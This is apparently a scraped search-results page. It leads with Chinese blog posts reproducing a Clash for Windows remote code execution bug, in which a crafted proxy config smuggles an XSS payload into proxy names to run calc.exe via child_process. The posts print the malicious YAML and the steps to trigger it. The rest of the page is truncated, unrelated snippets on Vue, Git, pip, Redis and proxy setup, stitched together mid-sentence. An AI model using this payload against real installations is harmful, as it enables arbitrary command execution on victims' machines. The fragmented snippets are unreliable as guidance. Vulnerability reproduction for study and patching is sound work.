精华内容
下载资源
问答
  • Clash For Windows远程代码执行漏洞复现&分析
    千次阅读
    2022-03-03 17:40:01

    image.png

    Github上曝光了Clash For Windows开源代理工具的远程代码执行漏洞。据了解该漏洞利用细节及漏洞利用代码已在网络上公开,其可能已被在野利用。

    漏洞危害

    代理规则配置文件中未设置严格的输入检测,攻击者可通过构造代理配置文件中的 XSS Payload 来执行任意 javascript 命令。

    漏洞复现

    构建恶意服务器站点,在站点部署cfg配置文件,内容如下

    订阅文件

    port: 7890
    socks-port: 7891
    allow-lan: true
    mode: Rule
    log-level: info
    external-controller: :9090
    proxies:
      - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
        type: socks5
        server: 127.0.0.1
        port: "17938"
        skip-cert-verify: true
      - name: abc
        type: socks5
        server: 127.0.0.1
        port: "8088"
        skip-cert-verify: true
    
    proxy-groups:
      -
        name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
        type: select
        proxies:
        - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    
    
    
     - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    

    image.png

    漏洞描述

    由于crash_for_windows_pkg可以根据URL下载进行配置Rules文件,crash_for_windows_pkg由Electron提供支持,该产品在代理规则配置文件中未设置严格的输入检测,攻击者可通过构造代理配置文件中的XSS Payload来执行任意JavaScript命令。

    漏洞范围

    Clash For Windows < 0.19.9

    漏洞分析

    crash_for_windows_pkg 由 Electron 提供支持,该产品在代理规则配置文件中未设置严格的输入检测,攻击者可通过构造代理配置文件中的XSS Payload来执行任意JavaScript命令。
    "proxies"中的"name"字段嵌入html标签,"onerror"时触发语句执行。

    更多相关内容
  • Clash for Windows命令执行漏洞

    千次阅读 2022-02-26 18:40:08
    Clash for Windows命令执行漏洞 环境: 环境地址:https://github.com/Fndroid/clash_for_windows_pkg/releases 一、编辑代码 POC地址:https://github.com/Fndroid/clash_for_windows_pkg/issues/2710 port: 7890 ...

    Clash for Windows命令执行漏洞

    环境:

    环境地址:https://github.com/Fndroid/clash_for_windows_pkg/releases
    在这里插入图片描述

    一、编辑代码

    POC地址:https://github.com/Fndroid/clash_for_windows_pkg/issues/2710

    port: 7890
    socks-port: 7891
    allow-lan: true
    mode: Rule
    log-level: info
    external-controller: :9090
    proxies:
      - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
        type: socks5
        server: 127.0.0.1
        port: "17938"
        skip-cert-verify: true
      - name: abc
        type: socks5
        server: 127.0.0.1
        port: "8088"
        skip-cert-verify: true
    
    proxy-groups:
      -
        name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
        type: select
        proxies:
        - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    

    二、修改后缀为.yaml

    在这里插入图片描述

    三、导入平台

    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述

    四、执行

    在这里插入图片描述
    在这里插入图片描述

    点击代理后,会弹出计算器

    展开全文
  • Windows版冲突 基于ClashWindows / macOS GUI
  • git for windows中文汉化

    2018-09-01 23:36:55
    根据git源码编译并制作的汉化包 git for windows 编译并添加了部分界面的汉化。 源码版本是2.17.0, 汉化方法,将压缩包解压到git安装目录
  • GitHub for windows

    2019-01-31 03:31:49
    GitHub for windows 离线版本 对于下载慢的童鞋提供
  • CFW脚本 用于一些脚本。 仅用于研究和测试用法,并在用法完成后自行删除代码。...用于安装Windows通知的mikaelbr/node-notifier脚本保留在Action Center中。 git clone https://github.com/yi-Xu-010
  • Clash for Windows A Windows/macOS/Linux GUI based on Clash and Electron.
  • 本项目将解析vmess、ss、trojan订阅链接,并将其内容转换为clash配置文件 config.yaml 所有代码均为python 使用环境 python 3.0 需额外安装的库:requests 使用方法 打开并运行 按提示输入相关信息即可 文件介绍 log...
  • Clash:Akun Clash untuk Android,Windows,Linux,OpenWrt
  • Clash Config Builder Clash配置文件在线定义 地址 在线地址: 注意 服务商提供的Clash配置地址一般会被,所以默认情况下此工具会通过API代理其请求,如担心隐私问题,请使用!!! 使用步骤 1. 编辑基础配置文件 ...
  • deepin安装clash for linux并创建图标

    千次阅读 2020-09-26 19:21:08
    补充1.yaml文件就是订阅后下载的那个文件...2.如果未配置完成就运行啦clash,再配置完成,看端口进程里面会有7890进程,但是clash网页配置和代理不会激活. 重启就好了. 实在看不懂就按教程配置完重启就好了. ...

    安装和配置

    参考https://www.cnblogs.com/sueyyyy/p/12424178.html

    补充1.yaml文件就是订阅后下载的那个文件,复制订阅链接进浏览器就可以下载.打开clash目录下的yaml,复制替换内容并保存.

    2.如果未配置完成就运行啦clash,再配置完成,看端口进程里面会有7890进程,但是clash网页配置和代理不会激活.

    重启就好了.

    实在看不懂就按教程配置完重启或者注销就好了.

    创建桌面图标

    之前一直失败,注意deepin的重命名显示的长度不够,所以最好终端里显示复制

    可以看到这个地方很容易出错,deepin的bug估计。还有deepin文件属性信息路径无法显示全也无法查看。

    如果不正确,是不会出现在图标里面的,虽然复制进了桌面文件.

    [Desktop Entry]
    Categories=System;Application;Network;
    Comment=clash-for-linux
    Encoding=UTF-8
    Exec=/home/fengmao/program/clash/clash-linux-amd64-v1.1.0
    GenericName=Clash
    Icon=/home/fengmao/program/clash/clash.png
    Name=Clash-For-Linux
    StartupNotify=true
    Terminal=false
    Type=Application
    X-Deepin-Vendor=user-custom

    发送到桌面图标路径

     sudo desktop-file-install clash-for-linux.desktop 

    或者

    sudo cp clash-for-linux.desktop /usr/share/applications

    结果

     

    展开全文
  • 对数组的循环的几个问题关键词:v-for对数组/对象的循环比遍历key的唯一取值(提升性能)占位符使用(template模板占位符)改变数组内容(数组遍历方法、对数组引用的改变、set方法)改变对象内容(对属性值的直接...

    2de3630682d047932eb2ba7b7089ec4e.png

    对数组的循环的几个问题

    关键词:

    • v-for对数组/对象的循环比遍历
    • key的唯一取值(提升性能)
    • 占位符使用(template模板占位符)
    • 改变数组内容(数组遍历方法、对数组引用的改变、set方法)
    • 改变对象内容(对属性值的直接操作、对对象引用的改变、set方法)

    一、v-for —— 列表渲染语法(涉及循环列表数组、对象)

    最基本的列表渲染写法:

    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <title>Vue中的列表渲染</title>
      <script src="./vue.js"></script>
    </head>
    <body>
     <div id="app">
      <div v-for="(item, index) in list"> //最基本的列表渲染
         {{item}}---{{index}} //最基本的列表渲染
      </div>
     </div>
     <script>
       var vm = new Vue ({
         el: "#app",
         data: {
           list: [
    	"miya wang",
    	 "2",
    	 "nice",
    	 "to",
    	 "meet",
    	 "you"
           ]
         }
        })
      </script>
     </body>
    </html>

    二、:key="xxx" —— 数组循环 唯一的key值 如何使用?

    涉及:遍历循环、提升性能
    遍历循环,涉及多次循环或一次完成的问题。提升循环显示的性能,可以为循环项加上唯一的key值,提高性能

    <body>
      <div id="app">
        <div v-for="(item, index) in list" 
    	 :key="item.id">
             {{item.text}}---{{index}}
        </div>
      </div>
      <script>
        var vm = new Vue ({
         el: "#app",
         data: {
          list: [
          {
          id: 010110210,
          text:"hello"
          },{
          id: 010110211,
          text:"world"
          },{
          id: 010110212,
          text:"miya"
          }
         ]
        }
       })
      </script>
    </body> 

    后端数据:返数据时,返回以下参数对象:
    (1)id:与数据库相关的唯一的数据条目的标识符(或数据库随机的字段,字段值是唯一的标识)(2)text(内容):数据的具体内容item.id(循环的每一项+它唯一的id号码):既是唯一的,同时又不是index这个索引下标,保证的key使用的唯一性,保证了性能上的最优

    三、v-for——对数组的循环遍历

    实现需求:改变数组内容,能够让页面变化
    1、第一种:使用数组遍历的方法动态增改变内容,数据发生变化,页面跟着变化。
    ❌:假设,如果直接修改数组下标的话,数据会改变,但页面并不会跟着改变。

    10219db4ee40244caae9e70745eccf01.png

    ✔️:使用数组遍历方法:push(往数组里增加一条)pop(数组最后一项删除掉)shift(数组的第一项删除掉)unshift(往数组的开头添加一个或更多元素)splice(在数据里做一些截取)sort(对数组做一些排序)reverse(对数组的取反)

    举例splice方法vm.list.splice(下标,数量, 该项的具体详情)

    b0068025c1c872a5ba1e9c892d47f42d.png

    2、第二种:改变数据的引用地址,实现数据变化,页面跟着变化

    783cc2592b25812d8d342670392aa2fc.png

    3、Vue实例中,数组上,set方法怎么使用?
    (1)Vue中全局方法:Vue.set(对象, 定位下标, 要改变的具体值)
    (2)Vue中实例方法:vm.$set(对象, 定位下标, 要改变的具体值)

    6743d234fa0e9a69d53a139c2398c206.png

    四、template —— 占位符使用

    template 模板占位符 在做多元素标签循环时,用来包裹一些元素做一个占位使用,但循环时并不会真正地渲染到页面上。如:

    <div id="app">
      <template v-for="(item, index) in list" 
                :key="item.id"
      >
       <div>
        {{item.text}}---{{index}}
       </div>
       <span>
        {{item.text}}
       </span>
      </template>
    </div>

    五、v-for —— 对对象的循环遍历

    <body>
      <div id="app">
       <!-- 一些可传递的值 -->
        <div v-for="(item, key, index) of userInfo"> 
          {{item}} --- {{key}} --- {{index}}
        </div>
      </div>
      <script>
       var vm = new Vue ({
         el: "#app",
         data: {
          userInfo: { //常见的对象数据结构
    	name: "miya wang",
    	age: "23",
    	gender: "female",
    	salary: "secret"
          }
         }
        })
      </script>
    </body>

    实现需求:改变对象内属性值,数据变化,页面也跟着变
    1、对象直接修改它自身的属性值(key值),数据变化,页面也会跟着变化

    743b5c6c08b32d48d4b7d5193e897caa.png

    2、遍历对象,动态增加新的属性值:通过直接修改对象的引用,数据变化,页面内容也跟着变化

    c6e8aa4d299e93262d75c9bc60428176.png

    3、Vue实例中,对象上,set方法怎么使用?
    (1)Vue中全局方法:Vue.set(对象, 需要改变的对象属性, 要改变的值)实现需求: 通过set方法来改变数据,从而改变页面的内容

    ea6372baa4b634390462b56c555c5df4.png

    (2)Vue的实例方法: vm.$set(对象, 需要改变的对象属性, 要改变的值)

    实现需求:同上

    19cbbc6d09677bb523408a5a1811cd7d.png
    展开全文
  • pip_main(['install', package]) if __name__ == '__main__': with open(sys.argv[1]) as f: for line in f: install(line) 局部安装 tap代理 2021.3.15号补充 使用clash的tap模式,在网卡上代理 安装tap模式 关闭...
  • GCC的一个完整的编译/运行时环境(A complete runtime environment for gcc) 支持Windows 64位和32位操作系统
  • 关于 Windows 的 Window当你成功进入 Windows 桌面,你所能看到的一切都可以被称之为 Window。许许多多的 Window 组合在了一起,于是便有了 Windows。桌面是 Window当你进入了 Window 系统后,就可以看到桌面 Window...
  • Git for Windows 国内镜像源加速下载 : https://mirrors.huaweicloud.com/git-for-windows/
  • 由于本人在安装github桌面时遇到过麻烦,在这些麻烦解决了之后就整理了这么些方法,有兴趣的可以来看看,有什么问题可以私信我喔。
  • clash 全部time out解决方法

    万次阅读 2021-06-01 17:20:51
    1.手动设置的DNS出现了问题,改成自动的DNS后,恢复正常。 2.安装双系统后,双系统时间不同步,同步两个系统的时候后恢复正常。
  • clash节点全部timeout问题

    千次阅读 2021-09-25 11:15:50
    删除先前的配置文件,然后通过url重新下载就可以解决问题了。
  • windows系统:WIN10 手机系统:安卓 吐槽!!!charles官网下载太慢……了,费了我一个多小时才下了1M多,干脆找了个破解版! charles安装 charles 破解版(3.11.3b7)下载: 链接:...
  • ubuntu16.04 windows7 https://blog.csdn.net/qq_28205153/article/details/52203512
  • crash_for_windows_pkg由 Electron 提供支持。如果 XSS 负载以代理的名义,我们可以远程执行受害者计算机上的任何 JavaScript 代码。 0x01受影响的版本 版本:0.19.8 平台:windows 操作系统细节:Windows 11 ARM ...
  • clash for ubuntu 遇到的问题及解决

    万次阅读 2020-05-02 18:06:32
    参考https://blog.csdn.net/weixin_38333199/article/details/103033068 1.执行:sudo ./filename 时,找不到命令。... 2.在运行clash的环节,遇到 FATA[0000] Can't load mmdb: error openin...
  • gitHub for windows设置网络代理

    千次阅读 2019-10-08 13:56:24
    但是gitHub for windows无法设置代理。 可以通过C:\Users\admin\.gitconfig中,添加代理。 添加: [http]proxy = proxy.XX.com:8080 保存以后就可以了。 gitHub就可以在代理环境下使用了 转载于:...
  • 记一次 Clash 端口为0的问题

    千次阅读 2021-10-22 02:53:17
    更新windows系统后,发现clash无法使用,再一看发现端口变成0而且无法更改。 经过查询后确认了是开启了hyper-V造成的,hyper-V会让win10的动态端口变成1024开始的13977个端口,然后hyper-V会随机保留端口,大概2860个...
  • 打开Clash 的 Allow LAN选项 把鼠标放在Allow LAN 后会显示 主机ip 和 虚拟机ip 切换到WSL2 命令行 ,输入: export https_proxy="http://192.168.10.1:7890" export http_proxy="http://192.168.10.1:7890"...
  • 解决win10自带应用无法联网问题

    千次阅读 2020-09-29 22:57:28
    使用clash for windows软件,里面有个 UWP Loopback 点击一下,会弹出这个界面。 然后你想让哪个软件走代理,就选中哪个软件,最后点击 Save Changes 即可。 特别注意:第一个选项不能打勾,否则设置没有作用的。 ...
  • redis sentinel两种启动方式: redis-sentinel sentinel.conf 或者 redis-server redis.conf --sentinel 两种方法都需要在window上面挂载配置文件,docker上面一直报如下错误: ...在网络上面找了很多方法都没有...
  • Windows使用CFW

    2022-04-14 17:05:31
    Clash有两个版本 (1)原始版本:https://github.com/Dreamacro/clash/releases (2)CFW版本:https://github.com/Fndroid/clash_for_windows_pkg/releases 推荐使用CFW版本。 1.启动 下载解压,点击Clash for ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,067
精华内容 426
关键字:

clash for windows